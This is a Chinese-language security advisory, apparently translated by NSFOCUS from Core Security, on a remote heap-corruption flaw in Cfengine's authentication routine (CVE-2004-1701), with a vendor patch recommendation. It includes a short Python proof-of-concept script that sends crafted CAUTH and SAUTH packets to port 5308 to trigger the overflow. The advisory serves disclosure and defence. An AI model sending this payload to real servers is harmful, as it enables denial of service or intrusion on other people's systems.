安全研究

安全漏洞
Cfengine RSA验证堆破坏远程执行指令漏洞

发布日期:2004-08-09
更新日期:2004-08-11

受影响系统:
Cfengine Cfengine 2.1.7p1
Cfengine Cfengine 2.1.7
Cfengine Cfengine 2.0.0
不受影响系统:
Cfengine Cfengine 2.1.8
描述:
CVE(CAN) ID: CVE-2004-1701

cfengine(配置引擎)是一款UNIX 管理工具,是管理任务自动化。

cfengine AuthenticationDialogue()函数没有充分检查缓冲区边界,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。

AuthenticationDialogue()函数用于处理SAUTH命令和执行RAS验证及KEY协定。由于对外部提供的网络数据:iscrypt, crypt_len和nonce_len缺少正确的检查,在进行堆分配时可导致任意字节被覆盖。精心构建提交数据可能以进程权限在系统上执行任意指令。

<*来源:Core Security Technologies
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109208394910086&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Core Security Technologies 提供了如下测试方法:

import struct
import socket
import time

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.1',5308)

            # CAUTH command
p = 'k'            # status
p += '0000023'         # len
p += 'CAUTH '         # command
p += 'HARE KRISHNA HARE'
print 'sending CAUTH command...'
s.send(p)
            # SAUTH command
p = 'k'            # status
p += '0003000'        # len
p += 'SAUTH '        # command
p += 'n'        # iscrypt
p += '00000010 '     # crypt_len
p += '00001000'        # nonce_len
p += 'X' * 3000
print 'sending SAUTH command...'
s.send(p)

a = s.recv(4096)
print a

建议:
厂商补丁:

Cfengine
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载最新的Cfengine 2.1.8版本:

http://www.cfengine.org

浏览次数:2680
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障